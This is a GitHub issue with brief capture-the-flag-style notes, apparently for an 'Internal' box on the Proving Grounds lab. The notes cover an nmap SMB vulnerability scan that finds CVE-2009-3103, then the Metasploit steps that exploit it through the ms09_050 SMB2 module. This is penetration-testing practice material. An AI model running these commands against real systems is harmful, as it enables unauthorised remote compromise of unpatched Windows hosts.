WDavid404 / PG-Box

PG box workthough note
0 stars 0 forks source link

Internal (easy) #6

Open WDavid404 opened 4 months ago

WDavid404 commented 4 months ago

Key points:

nmap -script smb-vuln* -p 139,445 -oN smb-vuln-scan $IP --> get more correct info than autoscan..

WDavid404 commented 4 months ago

According to autoscan's tcp_139_smb_nmap, image --> CVE-2017-0143 exit But it didn:t work image

However, if we do nmap -script smb-vuln* -p 139,445 -oN smb-vuln-scan 192.168.237.40 ---> we get CVE-2009-3103

msfconsole
search CVE-2009-3103
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
show options
set RHOST, LHOST, LPORT ...
run

image